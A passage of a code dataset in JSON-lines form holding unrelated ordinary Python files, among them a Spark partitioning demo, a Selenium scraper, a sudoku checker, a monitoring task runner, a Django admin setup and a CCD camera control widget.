used).\nrdd = sc.parallelize(nums)\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use parallelism of 2, the output would be:\n# Partitions structure: [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]\nrdd = sc.parallelize(nums, 2)\nprint(\"Default parallelism: {}\".format(sc.defaultParallelism))\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use parallelism of 15, the output would be:\n# Partitions structure: [[], [0], [1], [], [2], [3], [], [4], [5], [], [6], [7], [], [8], [9]]\n#\n# This is bad because the time needed to prepare a new thread for processing\n# data (one element) is significantly greater than processing time itself.\nrdd = sc.parallelize(nums, 15)\nprint(\"Default parallelism: {}\".format(sc.defaultParallelism))\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use a custom partitioner to partition data based on country so analysis can\n# be performed country-wise. The output would be:\n# [\n# [('Poland', {'name': 'Marek', 'amount': 51, 'country': 'Poland'}),\n# ('Poland', {'name': 'Paul', 'amount': 75, 'country': 'Poland' })],\n# [('United Kingdom', {'name': 'Bob', 'amount': 100, 'country': 'United Kingdom'}),\n# ('United Kingdom', {'name': 'James', 'amount': 15, 'coutry': 'United Kingdom'}),\n# ('Germany', {'name': 'Johannes', 'amount': 200, 'country': 'Germany' })],\n# [],\n# []\n# ]\n#\n# Note the hash() function put 'United Kingdom' and 'Germany' into the same bucket.\ntransactions = [\n {'name': 'Bob', 'amount': 100, 'country': 'United Kingdom'},\n {'name': 'James', 'amount': 15, 'country': 'United Kingdom'},\n {'name': 'Marek', 'amount': 51, 'country': 'Poland'},\n {'name': 'Johannes', 'amount': 200, 'country': 'Germany'},\n {'name': 'Paul', 'amount': 75, 'country': 'Poland'},\n]\n\ndef country_partitioner(country):\n return hash(country)\n\nrdd = sc.parallelize(transactions) \\\n .map(lambda el: (el['country'], el)) \\\n .partitionBy(4, country_partitioner)\n\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use mapPartitions to map through each partition; the input to mapPartition\n# handler is an iterator which can be used to iterate elements of a partition.\ndef sum_sales(iterator):\n yield sum(transaction[1]['amount'] for transaction in iterator)\n\nby_country = sc.parallelize(transactions) \\\n .map(lambda el: (el['country'], el)) \\\n .partitionBy(3, country_partitioner)\n\nprint(\"Partitions structure: {}\".format(by_country.glom().collect()))\n\n# Sum sales in each partition\nsum_amounts = by_country \\\n .mapPartitions(sum_sales) \\\n .collect()\n\nprint(\"Total sales for each partition: {}\".format(sum_amounts))\n\n# Classical word count; each task will do the map on its own partition, and\n# reduce will result in data shuffle.\nlogFile = \"file:///home/deyuan/code/projects/overview.org\"\nlogData = sc.textFile(logFile)\n\ncounts = logData.flatMap(lambda line: line.split(\" \")) \\\n .map(lambda word: (word, 1)).partitionBy(4)\n\n# Values of the same key will be passed to 'reduceByKey'. We'll see\n# four parition files in \"/tmp/hash\".\ncounts.reduceByKey(lambda x, y: x + y).saveAsTextFile(\"/tmp/hash\")\n\nsc.close()\n","sub_path":"ml-core/spark/experiments/python/rdd_partition.py","file_name":"rdd_partition.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"631884489","text":"import time\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome('/Users/Rosemary/Downloads/chromedriver') \ndriver.get('http://npb.jp/bis/2018/stats/idb2_g.html')\ntime.sleep(5) # Let the user actually see something!\n\ntbody = driver.find_element_by_xpath('//*[@id=\"stdivmaintbl\"]/table/tbody')\n# print(\"tbody: \", tbody)\n\nfor tr in tbody.find_elements_by_class_name('ststats'):\n for td in tr.find_elements_by_tag_name('td'):\n print(td.text)\n\ndriver.quit()\n\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"584617010","text":"\n\nclass Solution:\n # @param s, a string\n # @return a list of strings\n def restoreIpAddresses(self, s):\n if len(s) > 12:\n return []\n return self.restore(s, str())\n\n def restore(self, remainder, ip):\n res = []\n length = len(remainder)\n\n if length == 0 and len(ip.split(\".\")) == 5:\n return [ip[1:]]\n\n if length >= 1:\n res.extend(self.restore(remainder[1:], ip + \".\" + remainder[0:1]))\n\n if length >= 2:\n segment = remainder[0:2]\n if 9 < int(segment) < 100:\n res.extend(self.restore(remainder[2:], ip + \".\" + segment))\n\n if length >= 3:\n segment = remainder[0:3]\n if 99 < int(segment) < 256:\n res.extend(self.restore(remainder[3:], ip + \".\" + segment))\n\n return res\n\n\nip = \"19216812\"\nprint(Solution().restoreIpAddresses(ip))","sub_path":"Python/Restore IP Addresses.py","file_name":"Restore IP Addresses.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"382151941","text":"# Copyright 2014 the original author or authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom pubbot.dispatch import Signal\n\n# User got a tweet appear in their timeline\ntweet = Signal(providing_args=['screen_name', 'text'])\n\n# User deauthorises stream\naccess_revoked = Signal()\n\n# User is blocked, or user blocks someone\nblock = Signal()\n\n# User is unblocked, or user unblocks someone\nunblock = Signal()\n\n# User favorites something, or a users tweet is favorited\nfavorite = Signal()\n\n# User unfavorites something, or a users tweet is unfavorited\nunfavorite = Signal()\n\n# User follows someone, or is unfollowed\nfollow = Signal()\n\n# User unfollows someone\nunfollow = Signal()\n\nlist_created = Signal()\n\nlist_destroyed = Signal()\n\nlist_updated = Signal()\n\nlist_member_added = Signal()\n\nlist_member_removed = Signal()\n\nlist_user_subscribed = Signal()\n\nlist_user_unsubscribed = Signal()\n\nuser_update = Signal()\n","sub_path":"pubbot/twitter/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"203934018","text":"# QUASR Rocket GUI\n\n# Eric Donders\n# January 19, 2016\n\n# Meter class\n# displays a meter that can fill or empty\n\nfrom config import *\n\nclass Meter():\n\n def __init__(self, parent, maximum, minimum):\n self.parent = parent\n self.maximum = maximum\n self.minimum = minimum\n self.value = 0\n self.canvas = Canvas(parent, background='white')\n self.color = 'white'\n\n def place(self, x, y, width, height):\n # fit to current window size\n self.canvas.place(x=x, y=y, width=width, height=height)\n self.x = x # x position\n self.y = y # y position\n self.width = width # width of widget\n self.height = height # height of widget\n # draw plot\n self.draw()\n\n def draw(self):\n # clear canvas\n self.canvas.create_rectangle(0,0,self.width*self.value/self.maximum,self.height, fill=self.color, width=0)\n\n def send(self, value):\n if value <= self.maximum:\n if value > self.minimum:\n self.value = value\n else:\n self.value = self.minimum\n else:\n self.value = self.maximum\n if self.value >= self.maximum*0.6:\n self.color = 'green'\n elif self.value >= self.maximum*0.4:\n self.color = 'yellow'\n elif self.value >= self.maximum*0.2:\n self.color = 'orange'\n else:\n self.color = 'red'\n self.draw()\n\n def reset(self):\n self.value = 0\n self.draw()\n\n def destroy(self):\n self.canvas.destroy()\n","sub_path":"meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"89638547","text":"# -*- coding: cp936 -*-\n# 导入模块\nfrom socket import *\n\n# 定义主机\nHost = \"192.168.25.76\"\n# 定义端口号\nPort = 21567\n# 定义接收缓冲区\nBufSize = 1024\n\nAddr = (Host, Port)\ntry:\n udpClient = socket(AF_INET, SOCK_DGRAM)\n\n # 循环接收数据\n while True:\n data = input(\">\")\n if not data:\n break;\n udpClient.sendto(bytes(data, \"utf-8\"), Addr)\n r_data,Addr = udpClient.recvfrom(BufSize)\n if not data:\n break;\n print(\"return:\", r_data)\nexcept EOFError as error:\n print(\"EOFError:\" + str(error))\nfinally:\n if udpClient in locals():\n udpClient.close()\n","sub_path":"Chapter02/tsUcInt_py3.py","file_name":"tsUcInt_py3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"499778118","text":"def ok_to_add(row, column, number):\n number = str(number)\n \n #Loop through every part of the board. x = row, y = column\n for x in range(len(bd)): \n for y in range(len(bd[x])):\n \n #If the column contains the same number, return false\n if(bd[row][y] == number):\n return False\n \n #If row contains same number,return false\n elif(bd[x][column] == number):\n return False\n \n #Check each 3 by 3 grid\n \n #Checks top third of board\n if(row in [0, 1, 2] and x in [0, 1, 2]):\n \n #Checks top left 3x3\n if(column in [0, 1, 2] and y in [0, 1, 2]):\n if(number == bd[x][y]):\n return False \n \n #Checks top middle 3x3\n elif(column in [3, 4, 5] and y in [3, 4, 5]):\n if(number == bd[x][y]):\n return False\n \n #Checks top right 3x3\n elif(column in [6, 7, 8] and y in [6, 7, 8]):\n if(number == bd[x][y]):\n return False\n \n #Checks center third of board\n elif(row in [3, 4, 5] and x in [3, 4, 5]):\n \n #Checks center left 3x3\n if(column in [0, 1, 2] and y in [0, 1, 2]):\n if(number == bd[x][y]):\n return False\n \n #Checks center middle 3x3\n elif(column in [3, 4, 5] and y in [3, 4, 5]):\n if(number == bd[x][y]):\n return False\n \n #Checks center right 3x3\n elif(column in [6, 7, 8] and y in [6, 7, 8]):\n if(number == bd[x][y]):\n return False\n \n #Checks bottom third\n elif(row in [6, 7, 8] and x in [6, 7, 8]):\n \n #Checks bottom left 3x3\n if(column in [0, 1, 2] and y in [0, 1, 2]):\n if(number == bd[x][y]):\n return False\n \n #Checks bottom middle 3x3\n elif(column in [3, 4, 5] and y in [3, 4, 5]):\n if(number == bd[x][y]):\n return False\n \n #Checks bottom right 3x3\n elif(column in [6, 7, 8] and y in [6, 7, 8]):\n if(number == bd[x][y]):\n return False\n return True\n\n\nbd = [ [ '1', '.', '.', '.', '2', '.', '.', '3', '7'],\n [ '.', '6', '.', '.', '.', '5', '1', '4', '.'],\n [ '.', '5', '.', '.', '.', '.', '.', '2', '9'],\n [ '.', '.', '.', '9', '.', '.', '4', '.', '.'],\n [ '.', '.', '4', '1', '.', '3', '7', '.', '.'],\n [ '.', '.', '1', '.', '.', '4', '.', '.', '.'],\n [ '4', '3', '.', '.', '.', '.', '.', '1', '.'],\n [ '.', '1', '7', '5', '.', '.', '.', '8', '.'],\n [ '2', '8', '.', '.', '4', '.', '.', '.', '6'] ]\n\n#Loop through the rows\nfor x in range(len(bd)): \n #If row is a border, print border before numbers\n if(x == 0 or x == 3 or x == 6):\n print('-' * 25) \n \n #Loop through the columns for this row \n for y in range(len(bd[x])): \n \n #If column is after a border, print border before number\n if( y == 0 or y == 3 or y == 6):\n print('|', end=' ')\n \n #Print number in that column\n print(bd[x][y], end=' ')\n \n #If column is before a border, print before after number\n if (y == 8):\n print('|')\n \n #If row is before the end, print border after the numbers\n if(x == 8):\n print('-' * 25)\n\nx1 = int(input('Enter a row from 0 to 8 ==> '))\ny1 = int(input('Enter a column from 0 to 8 => '))\nnumb = int(input('Enter the number from 1 to 9 => '))\n\nprint(ok_to_add(x1, y1, numb))\n","sub_path":"RPI-CSCI-1100 Computer Science I/lab/Lab6/check2.py","file_name":"check2.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633406603","text":"from models import Meal, Option, db_session\nfrom catalogue import catalogue\n\n\ndef update_db(catalogue):\n for meal in catalogue:\n meal_to_add = Meal(title=meal[\"title\"],\n description=meal[\"description\"])\n for choice in meal[\"choices\"]:\n option = Option(size=choice[\"title\"], price=choice[\"price\"])\n meal_to_add.options.append(option)\n db_session.add(meal_to_add)\n db_session.commit()\n\n\nif __name__ == '__main__':\n update_db(catalogue)\n","sub_path":"load_catalogue.py","file_name":"load_catalogue.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"64932179","text":"import logging\nlog = logging.getLogger(__name__)\n\n# Events, for Task\nimport event\n\n# Subprocess, for NagiosTask\nimport subprocess\nimport shlex\n\n# Multiprocessing, for PythonTask\nimport multiprocessing\n\n# Requests, for CloudKickTask\nimport requests\nrequests_log = logging.getLogger(\"requests\")\nrequests_log.setLevel(logging.WARNING)\n\nimport time\n\nclass Task():\n\tdef __init__(self, name, ttl):\n\t\tlog.info(\"Creating task: '%s' with TTL of %ss\" % (name, ttl))\n\t\tself.events = event.Events()\n\t\tself.name = name\n\t\tself.ttl = ttl\n\t\tself.tags = []\n\t\tself.timings = [0.75]\n\n\tdef add_tags(self, tags):\n\t\tif type(tags) == type(str()):\n\t\t\tself.tags.append(tags)\n\t\telif type(tags) == type(list()):\n\t\t\tself.tags.extend(tags)\n\n\tdef add_timing(self, value, keep=5):\n\t\tlog.debug(\"Task %s took %0.2fs\" % (self.name, value))\n\t\tself.timings.append(value)\n\t\tdel self.timings[:-keep]\n\n\tdef skew(self):\n\t\treturn sum(self.timings)/len(self.timings)\n\n\tdef start(self):\n\t\tlog.info(\"Starting task: '%s' (usually takes %0.2fs)\" % (self.name, self.skew()))\n\t\tself.start_time = time.time()\n\t\tself.run()\n\n\tdef get_events(self):\n\t\tself.join()\n\t\tself.end_time = time.time()\n\t\tself.add_timing(self.end_time - self.start_time)\n\n\t\treturn self.events\n\n\nclass PythonTask(Task):\n\tdef __init__(self, name, ttl, arg):\n\t\tTask.__init__(self, name, ttl)\n\t\tself.module = arg\n\n\tdef run(self):\n\t\t# TODO: Not yet built. Needs dynamic module/class loading\n\t\tpass\n\n\tdef join(self):\n\t\t#self.events.add(service=self.name, state=state, description=description, ttl=self.ttl, tags=self.tags)\n\t\tpass\n\n\nclass CloudKickTask(Task):\n\tdef __init__(self, name, ttl, arg):\n\t\tTask.__init__(self, name, ttl)\n\t\tself.url = arg\n\n\tdef request(self, url, q):\n\t\ttry:\n\t\t\tlog.debug(\"Starting web request to '%s'\" % (url))\n\t\t\tresp = requests.get(url)\n\t\t\tq.put(resp.json(), timeout=(self.ttl * 0.3))\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception during request method of CloudKickTask '%s'\\n%s\" % (self.name, str(e)))\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.q = multiprocessing.Queue()\n\t\t\tself.proc = multiprocessing.Process(target=self.request, args=(self.url, self.q))\n\t\t\tself.proc.start()\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception starting CloudKickTask '%s'\\n%s\" % (self.name, str(e)))\n\n\tdef join(self):\n\t\ttry:\n\t\t\tjson_result = self.q.get(timeout=(self.ttl * 0.3))\n\t\t\tself.proc.join()\n\n\t\t\tlog.debug('CloudKickTask: Processing %s metrics' % (len(json_result['metrics'])))\n\t\t\tfor metric in json_result['metrics']:\n\t\t\t\tself.events.add(\n\t\t\t\t\tservice=metric['name'],\n\t\t\t\t\tstate=metric['state'],\n\t\t\t\t\tmetric=metric['value'],\n\t\t\t\t\tdescription=\"Warn threshold: %s, Error threshold: %s\" % (metric['warn_threshold'], metric['error_threshold']),\n\t\t\t\t\tttl=self.ttl,\n\t\t\t\t\ttags=self.tags\n\t\t\t\t)\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception joining CloudKickTask '%s'\\n%s\" % (self.name, str(e)))\n\n\nclass NagiosTask(Task):\n\texitcodes = {\n\t\t0: 'ok',\n\t\t1: 'warn',\n\t\t2: 'critical',\n\t\t3: 'unknown'\n\t}\n\n\tdef __init__(self, name, ttl, arg, shell=False):\n\t\tTask.__init__(self, name, ttl)\n\t\tself.raw_command = arg\n\t\tself.command = shlex.split(arg)\n\t\tself.use_shell = shell\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.process = subprocess.Popen(self.command, stdout=subprocess.PIPE, shell=self.use_shell)\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception running task '%s':\\n%s\" % (self.name, str(e)))\n\n\tdef join(self):\n\t\ttry:\n\t\t\tstdout, sterr = self.process.communicate()\n\t\t\tdescription = self.raw_command + \"\\n\" + stdout\n\t\t\treturncode = self.process.returncode\n\n\t\t\tif returncode in self.exitcodes:\n\t\t\t\tstate = self.exitcodes[returncode]\n\t\t\telse:\n\t\t\t\tstate = 'unknown'\n\n\t\t\tself.events.add(service=self.name, state=state, description=description, ttl=self.ttl, tags=self.tags)\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception joining task '%s':\\n%s\" % (self.name, str(e)))\n","sub_path":"lib/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121003004","text":"# 画面表示に関するクラス\n\nimport tkinter as tk\n\nclass View:\n\n # インスタンス生成時にWindowタイトルを決定。\n def __init__(self, title):\n \n self.title = title\n\n def WindowView(self): \n \n root = tk.Tk()\n\n root.title(self.title)\n\n root.geometry(\"800x600\")\n\n img = tk.PhotoImage(file = \"sample.png\")\n\n canvas = tk.Canvas(root, width = 640, height = 480)\n\n canvas.create_rectangle(0, 0, 640, 480, fill='green')\n\n canvas.place(x = 80, y = 60)\n\n canvas.create_image(0, 0, anchor='nw', image = img)\n\n root.mainloop()\n","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"535801501","text":"#! /usr/bin/env python\n# coding: utf-8\n\nimport cv2\nimport numpy as np\n\nimport PIL\nimport PIL.Image\nimport PIL.ImageFont\nimport PIL.ImageDraw\n\n__all__ = (\"draw_textlines\", \"stitch_images\", \"get_label_color_map\")\n\n\ndef draw_textlines(image, origin, lines, color, size=26, thickness=2):\n \"\"\"在图片上写文字, 支持中文.\"\"\"\n\n img = PIL.Image.fromarray(image)\n draw = PIL.ImageDraw.Draw(img)\n font = PIL.ImageFont.truetype('simsun.ttc', size)\n if isinstance(lines, str): lines = [lines]\n for n, text in enumerate(lines):\n offset_y = n * size + thickness\n for i in range(0, thickness):\n for j in range(0, thickness):\n org = (origin[0] + i, origin[1] + j + offset_y)\n draw.text(org, text, font=font, fill=color)\n return np.array(img)\n\n\ndef stitch_images(images, width=512, height=384, fill=(0, 0, 0)):\n \"\"\"将<=9个patch合为一个.\n\n images: 包含最多9个cv2格式的image的list.\n width: 每一幅图像占据的宽度.\n height: 每一幅图像占据的高度.\n \"\"\"\n\n assert len(images) <= 9\n rows = cols = 1\n if len(images) <= 1:\n rows, cols = 1, 1\n elif len(images) <= 2:\n rows, cols = 1, 2\n elif len(images) <= 4:\n rows, cols = 2, 2\n elif len(images) <= 6:\n rows, cols = 2, 3\n elif len(images) <= 9:\n rows, cols = 3, 3\n\n stitched = np.zeros((height * rows, width * cols, 3), dtype=np.uint8)\n stitched[:, :] = fill\n for i, image in enumerate(images):\n if image is None: continue\n\n # 有需要的话进行保长宽比的resize\n old_height, old_width = image.shape[:2]\n if old_height > height or old_width > width:\n new_height = height\n new_width = new_height * old_width // old_height\n if new_width > width:\n new_width = width\n new_height = new_width * old_height // old_width\n image = cv2.resize(image, (new_width, new_height))\n\n new_height, new_width = image.shape[:2]\n start_x = (i % cols) * width + (width - new_width) // 2\n start_y = (i // cols) * height + (height - new_height) // 2\n end_x = start_x + new_width\n end_y = start_y + new_height\n stitched[start_y:end_y, start_x:end_x, :] = image\n return stitched\n\n\ndef get_label_color_map(labels):\n \"\"\"给每一个label生成一个color.\n\n 方法来自: http://blog.csdn.net/yhl_leo/article/details/52185581\n \"\"\"\n\n assert len(labels) < 256, \\\n \"this method can only generate 255 different colors.\"\n colors = []\n for i in range(len(labels)):\n r, g, b, ii = (0, 0, 0, i)\n for j in range(7):\n str_ii = \"{:0>8}\".format(bin(ii)[2:])[-8:]\n r = r ^ (int(str_ii[-1]) << (7 - j))\n g = g ^ (int(str_ii[-2]) << (7 - j))\n b = b ^ (int(str_ii[-3]) << (7 - j))\n ii = ii >> 3\n colors.append((r, g, b))\n return dict(zip(labels, colors))\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"lib/util/imgutil.py","file_name":"imgutil.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"84779258","text":"from django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import serializers\nfrom requests.exceptions import HTTPError\nfrom allauth.socialaccount.helpers import complete_social_login\n\n\nclass SocialLoginSerializer(serializers.Serializer):\n\n access_token = serializers.CharField(required=True)\n\n @method_decorator(csrf_exempt)\n def validate_access_token(self, value):\n access_token = value\n\n view = self.context.get('view')\n request = self.context.get('request')\n\n if not view:\n raise serializers.ValidationError('View is not defined, pass it ' +\n 'as a context variable')\n self.adapter_class = getattr(view, 'adapter_class', None)\n\n if not self.adapter_class:\n raise serializers.ValidationError('Define adapter_class in view')\n self.adapter = self.adapter_class()\n app = self.adapter.get_provider().get_app(request)\n token = self.adapter.parse_token({'access_token': access_token})\n token.app = app\n\n try:\n login = self.adapter.complete_login(request, app, token,\n response=access_token)\n token.account = login.account\n login.token = token\n complete_social_login(request, login)\n except HTTPError:\n raise serializers.ValidationError('Incorrect value')\n\n if not login.is_existing:\n login.lookup()\n if not login.account.user.username:\n login.account.user.username = \"_\".join([login.account.user.first_name, login.account.user.last_name])\n try:\n login.save(request, connect=True)\n except Exception as e:\n import ipdb ; ipdb.set_trace()\n self.object = {'user': login.account.user}\n\n return value\n","sub_path":"rest_auth/registration/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486551043","text":"from operator import itemgetter\n\nfrom PyQt5.QtWidgets import (QWidget, QLCDNumber,\n QPushButton, QTextEdit,\n QComboBox)\nfrom src.interface.MainWindow import MainWindow\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\nfrom src.ccd.core import SbigDriver, sbigLib\n\n\nclass InfoTemp(QWidget):\n scheduler2 = BackgroundScheduler()\n jobRefresh = None\n\n def __init__(self, parent = None):\n super(InfoTemp, self).__init__(parent)\n self.parent = parent\n self.lcd = QLCDNumber(self)\n self.lcd.setDigitCount(4)\n self.lcd.setGeometry(40, 50, 220, 40)\n\n self.stbutton = QPushButton(\"Fan\", self)\n self.stbutton.clicked.connect(self.btnFan)\n self.stbutton.resize(75, 25)\n self.stbutton.move(20, 100)\n\n self.fFan = QTextEdit(self)\n if SbigDriver.is_fanning():\n s = \"ON\"\n else:\n s = \"OFF\"\n\n self.fFan.setText(s)\n self.fFan.setReadOnly(True)\n self.fFan.resize(75, 25)\n self.fFan.move(75, 100)\n\n self.a = [['CFWP_1', 1], ['CFWP_2', 2], ['CFWP_3', 3], ['CFWP_4', 4], ['CFWP_5', 5]]\n\n self.combo = QComboBox(self)\n self.fill_filtercombo()\n self.combo.resize(75, 25)\n self.combo.move(200, 20)\n\n self.sfbutton = QPushButton(\"Set Filter\", self)\n self.sfbutton.clicked.connect(self.setFilter)\n self.sfbutton.resize(75, 25)\n self.sfbutton.move(280, 20)\n\n self.fFilter = QTextEdit(self)\n self.fFilter.setText(str(SbigDriver.get_filterposition()))\n self.fFilter.resize(75, 25)\n self.fFilter.move(350, 20)\n\n self.setbutton = QPushButton(\"Set Temp\", self)\n self.setbutton.clicked.connect(self.btnSetTemp)\n self.setbutton.resize(75, 25)\n self.setbutton.move(10, 20)\n\n self.tb = QTextEdit(self)\n self.tb.resize(75, 25)\n self.tb.move(100, 20)\n\n self.clockRefresh()\n self.startJob()\n\n def fill_filtercombo(self):\n if not MainWindow.isLocked(MainWindow):\n MainWindow.setAcquire(MainWindow)\n\n firmwarev, numberf = SbigDriver.get_filterinfo()\n\n mylist = []\n\n for nameAttr in dir(sbigLib.CFW_POSITION):\n attr = getattr(sbigLib.CFW_POSITION, nameAttr)\n if not callable(attr):\n if type(attr) == sbigLib.CFW_POSITION:\n mylist.append([nameAttr, attr.value])\n\n # sort list by column value\n mylist = sorted(mylist, key=itemgetter(1))\n\n for item in mylist:\n #exclude unknown item\n if item[1] > 0:\n self.combo.addItem(item[0], item[1])\n if self.combo.count() == numberf:\n break\n\n MainWindow.setRelease(MainWindow)\n\n\n\n # Functions for Watch\n # Scheduling a new refresh\n def startJob(self):\n InfoTemp.jobRefresh = self.scheduler2.add_job(self.clockRefresh, 'interval', seconds=1)\n self.scheduler2.start()\n\n\n def startScheduler(self):\n InfoTemp.jobRefresh.resume()\n\n def stopScheduler(self):\n InfoTemp.jobRefresh.pause()\n\n\n def clockRefresh(self):\n if not MainWindow.isLocked(MainWindow):\n MainWindow.setAcquire(MainWindow)\n\n try:\n self.lcd.display(float(tuple(SbigDriver.get_temperature())[3]))\n except Exception as e:\n self.lcd.display(\"---\")\n print(\"Exception: {}\".format(e))\n finally:\n MainWindow.setRelease(MainWindow)\n\n\n # Fan Buttons\n def optionFan(self):\n MainWindow.setAcquire(MainWindow)\n\n try:\n self.btnFan = QPushButton(\"Fan: ON\", self)\n self.btnFan.clicked.connect(self.btnFan)\n except Exception as e:\n MainWindow.status(MainWindow, \"Failed. Exception: {}\".format(e))\n finally:\n MainWindow.setRelease(MainWindow)\n\n def btnFan(self):\n MainWindow.setAcquire(MainWindow)\n try:\n if (SbigDriver.is_fanning()):\n SbigDriver.stop_fan()\n self.fFan.setText(\"OFF\")\n else:\n SbigDriver.start_fan()\n self.fFan.setText(\"ON\")\n except Exception as e:\n MainWindow.status(MainWindow, \"Exception: {}\".format(e))\n finally:\n MainWindow.setRelease(MainWindow)\n\n def btnSetTemp(self):\n MainWindow.setAcquire(MainWindow)\n\n try:\n SbigDriver.set_temperature(regulation=True, setpoint=int(self.tb.toPlainText()), autofreeze=False)\n MainWindow.status(self.parent, \"Temperature set to: \" + str(int(self.tb.toPlainText())))\n except Exception as e:\n print(e)\n MainWindow.status(self.parent, \"Set temperature Failed!\")\n finally:\n MainWindow.setRelease(MainWindow)\n\n # Filter Options\n def setFilter(self):\n MainWindow.setAcquire(MainWindow)\n\n try:\n #get integer filter\n filter = self.combo.currentData()\n print(filter)\n\n #get type filter by description\n desc = self.combo.currentText()\n attr = getattr(sbigLib.CFW_POSITION, desc);\n\n SbigDriver.set_filterposition(attr)\n self.fFilter.setText(str(SbigDriver.get_filterposition()))\n print(str(SbigDriver.get_filterposition()))\n except Exception as e:\n print(e)\n finally:\n MainWindow.setRelease(MainWindow)","sub_path":"src/interface/widgets/InfoTemp.py","file_name":"InfoTemp.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373299623","text":"import unittest\nimport os\nfrom random import randint\nfrom appium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.common.keys import Keys\n\nclass LoginTests(unittest.TestCase):\n\n def setUp(self): \n app = ('/Users/laichongli/Library/Developer/Xcode/DerivedData/Coffee_Luguo-fphgosuwvglzdybzrsacxrmnulcz/Build/Products/Debug-iphonesimulator/Coffee Luguo.app')\n self.driver = webdriver.Remote(\n command_executor='http://127.0.0.1:4723/wd/hub',\n desired_capabilities={\n 'app': app,\n 'platformName': 'iOS',\n 'platformVersion': '12.0',\n 'deviceName': 'iPhone 6s'\n }\n )\n\n def tearDown(self):\n self.driver.quit()\n\n def testEmailField(self):\n self.driver.find_element_by_accessibility_id('startButton').click()\n\n if __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(LoginTests)\n unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"loginTest.py","file_name":"loginTest.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"485580049","text":"from django.contrib import admin\nfrom archive.models import Heading, Category, Template, Person\n\nclass CategoryInline(admin.StackedInline):\n model = Category\n\nclass HeadingAdmin(admin.ModelAdmin):\n list_display = ('name', 'code', 'chinese_code', 'sequence')\n inlines = [ CategoryInline ]\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = ('name', 'code', 'sequence')\n\nclass TemplateAdmin(admin.ModelAdmin):\n list_display = ('name', 'category', 'sequence', 'page_count', 'approved', 'comment', 'description')\n list_filter = ('category', 'approved')\n search_fields = ['name']\n\nadmin.site.register(Heading, HeadingAdmin)\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Template, TemplateAdmin)\nadmin.site.register(Person)\nadmin.site.site_header = \"管理平台\"\n#admin.site.index_template = 'admin/index.html'\n#admin.autodiscover()","sub_path":"archive/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"180232708","text":"from openerp.osv import osv, 